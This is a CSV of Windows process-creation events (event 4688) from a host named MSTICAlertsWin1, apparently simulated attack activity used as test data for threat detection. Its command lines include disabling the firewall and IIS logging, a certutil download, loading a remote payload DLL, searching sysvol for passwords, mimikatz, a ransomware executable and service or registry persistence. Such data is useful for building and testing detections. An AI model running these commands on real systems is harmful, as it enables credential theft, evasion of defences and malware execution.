+191,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.300,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1770,C:\Windows\SoftwareDistribution\cscript.exe,%%1936,0x16f4,c:\windows\softwaredistribution\cscript.exe,C:\Diagnostics\UserTmp\lsass.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.300
+192,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.320,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1774,C:\Windows\System32\net1.exe,%%1936,0x1770,C:\Windows\system32\net1,C:\Windows\SoftwareDistribution\cscript.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.320
+193,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.337,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1728,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""powershell wscript.shell used to download a .gif""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.337
+194,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.403,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1798,C:\Diagnostics\UserTmp\cacls.exe,%%1936,0xbc8,cacls.exe  c:\windows\system32\wscript.exe /e /t /g everyone:f,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.403
+195,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.450,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1758,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""cd /d ""C:\inetpub\wwwroot""&c:\windows\system32\inetsrv\appcmd set config ""Default Web Site/"" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.450
+196,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.500,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17a8,C:\Diagnostics\UserTmp\2840.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\2840.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.500
+197,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.547,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17f8,C:\Diagnostics\UserTmp\a_keygen.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\a_keygen.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.547
+198,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.553,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17cc,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c echo "" SYSTEMINFO && SYSTEMINFO && DEL """,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.553
+199,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.630,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1414,C:\Diagnostics\UserTmp\bittorrent.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\bittorrent.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.630
+200,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.670,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x28c,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\netsh.exe   firewall set opmode mode=disable profile=all,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.670
+201,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.707,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xc18,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,cmd  /c echo rundll32.exe perfc.dat,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.707
+202,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.770,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1404,C:\Diagnostics\UserTmp\ransomware.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\ransomware.exe   @ abc.com abc.wallet,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.770
+203,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.820,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x147c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,cmd  /c echo /e:vbscript.encode /b,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.820
+204,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.867,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1464,C:\Diagnostics\UserTmp\pcalua.exe,%%1936,0xbc8,pcalua.exe  -a \\server\payload.dll,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.867
+205,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.917,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14b8,C:\Diagnostics\UserTmp\findstr.exe,%%1936,0xbc8,findstr  /si password sysvol *.txt,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.917
+206,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.967,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14ec,C:\Diagnostics\UserTmp\odbcconf.exe,%%1936,0xbc8,odbcconf.exe  /S /A {REGSVR C:\Users\Administrator\AppData\Roaming\{RANDOM}.txt,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.967
+207,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.010,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14f0,C:\Diagnostics\UserTmp\odbcconf.exe,%%1936,0xbc8,odbcconf.exe  /f my.rspáá,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.010
+208,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.060,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14e8,C:\Diagnostics\UserTmp\SQLDumper.exe,%%1936,0xbc8,sqldumper.exe  464 0 0x0110:40,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.060
+209,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.127,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1564,C:\Diagnostics\UserTmp\mt.exe,%%1936,0xbc8,mt.exe  port,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.127
+210,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.180,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x155c,C:\Diagnostics\UserTmp\mt.exe,%%1936,0xbc8,mt.exe  smb,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.180
+211,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.223,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15b8,C:\Diagnostics\UserTmp\hd.exe,%%1936,0xbc8,hd.exe  -pslist,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.223
+212,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.337,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15d0,C:\Diagnostics\UserTmp\hd.exe,%%1936,0xbc8,hd.exe  -enum,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.337
+213,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.403,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x158c,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,netsh.exe  PortOpenning,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.403
+214,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.447,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1638,C:\Diagnostics\UserTmp\certutil.exe,%%1936,0xbc8,certutil  -urlcache -split -f http://127.0.0.1/ ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.447
+215,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.490,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1624,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg  add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\MyNastySvcHostConfig""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.490
+216,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.537,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1628,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg  delete ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\MyNastySvcHostConfig""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.537
+217,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.583,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1654,C:\Windows\System32\sc.exe,%%1936,0xbc8,"sc  create MSTICTestService binPath=C:\Users\MSTICA~1\AppData\Local\Temp\hd.exe DisplayName=""Test Service""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.583
+218,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.617,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x169c,C:\Windows\System32\sc.exe,%%1936,0xbc8,sc  delete MSTICTestService,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.617
+219,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:20.623,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1694,C:\Windows\System32\wermgr.exe,%%1936,0x440,C:\Windows\system32\wermgr.exe -upload,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:20.623
+220,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:26.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x16c4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:26.013
+221,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.033,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1724,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""echo blahtest > \\.\pipe\blahtest""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.033
+222,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.100,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1744,C:\Windows\System32\win32calc.exe,%%1936,0x1724,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.100
+223,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.157,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1758,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg.exe   add ""hkcu\console"" /v windowposition /t reg_dword /d 33554556 /f",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.157
+224,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.227,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1778,C:\Windows\System32\win32calc.exe,%%1936,0x1758,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\reg.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.227
+225,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.293,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x178c,C:\Windows\Fonts\csrss.exe,%%1936,0xbc8,c:\windows\fonts\csrss.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.293
+226,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.377,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17ac,C:\Windows\System32\win32calc.exe,%%1936,0x178c,"""C:\Windows\System32\win32calc.exe"" ",C:\Windows\Fonts\csrss.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.377
+227,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.453,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17bc,C:\Windows\System32\win32calc.exe,%%1936,0x17ac,"""C:\Windows\System32\win32calc.exe"" ",C:\Windows\System32\win32calc.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.453
+228,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:14.453,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x17c0,C:\Windows\System32\svchost.exe,%%1936,0x230,C:\Windows\System32\svchost.exe -k WerSvcGroup,C:\Windows\System32\services.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.453
+229,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:14.490,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x17dc,C:\Windows\System32\WerFault.exe,%%1936,0x17ac,C:\Windows\system32\WerFault.exe -u -p 6060 -s 472,C:\Windows\System32\win32calc.exe,0xfaac27,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.490
+230,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.493,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17e4,C:\Windows\Fonts\conhost.exe,%%1936,0xbc8,c:\windows\fonts\conhost.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.493
+231,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.563,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1440,C:\Diagnostics\UserTmp\mimikatz.exe,%%1936,0xbc8,.\mimikatz.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.563
+232,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.613,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1434,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32.exe  /C c:\windows\fonts\conhost.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.613
+233,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.640,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1424,C:\Windows\Fonts\conhost.exe,%%1936,0x1434,c:\windows\fonts\conhost.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.640
+234,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.693,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x123c,C:\Diagnostics\UserTmp\regsvr32.exe,%%1936,0xbc8,.\regsvr32  /u /s c:\windows\fonts\csrss.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.693
+235,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.770,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x240,C:\Windows\System32\tasklist.exe,%%1936,0xbc8,tasklist,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.770
+236,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:05:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1040,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:05:26.000
+237,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:06:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x690,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:06:24.000
+238,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:06:24.043,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11ac,C:\Windows\System32\conhost.exe,%%1936,0x690,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:06:24.043
+239,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:06:25.770,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd04,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:06:25.770
+240,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:06:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc18,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:06:26.000
+241,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:34:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13e4,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:34:24.010
+242,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:34:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10e4,C:\Windows\System32\conhost.exe,%%1936,0x13e4,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:34:24.030
+243,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:34:25.583,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x90c,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:34:25.583
+244,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:34:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xfbc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:34:26.000
+245,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:25:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbdc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:25:26.000
